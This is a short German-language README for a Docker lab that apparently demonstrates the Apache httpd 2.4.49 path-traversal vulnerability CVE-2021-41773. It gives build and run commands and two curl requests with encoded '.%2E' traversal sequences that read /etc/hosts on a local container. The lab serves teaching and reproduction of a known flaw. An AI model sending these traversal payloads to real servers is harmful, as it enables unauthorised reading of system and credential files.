
Pädagogisches Docker-basiertes Labor, das den Path-Traversal-Exploit CVE-2021-41773 gegen Apache httpd 2.4.49 demonstriert, mit curl-basierten Exploit-Befehlen.
Nur für Bildungszwecke.
Siehe Referenz für Details.
$ git clone https://github.com/masahiro331/CVE-2021-41773.git
$ cd CVE-2021-41773
$ docker build -t cve-2021-41773 .
$ docker run -d -p 8080:80 cve-2021-41773
# Diese Sicherheitslücke betrifft die Verwendung von Alias.
$ curl http://localhost:8080/cgi-bin/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
$ curl http://localhost:8080/webpath/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts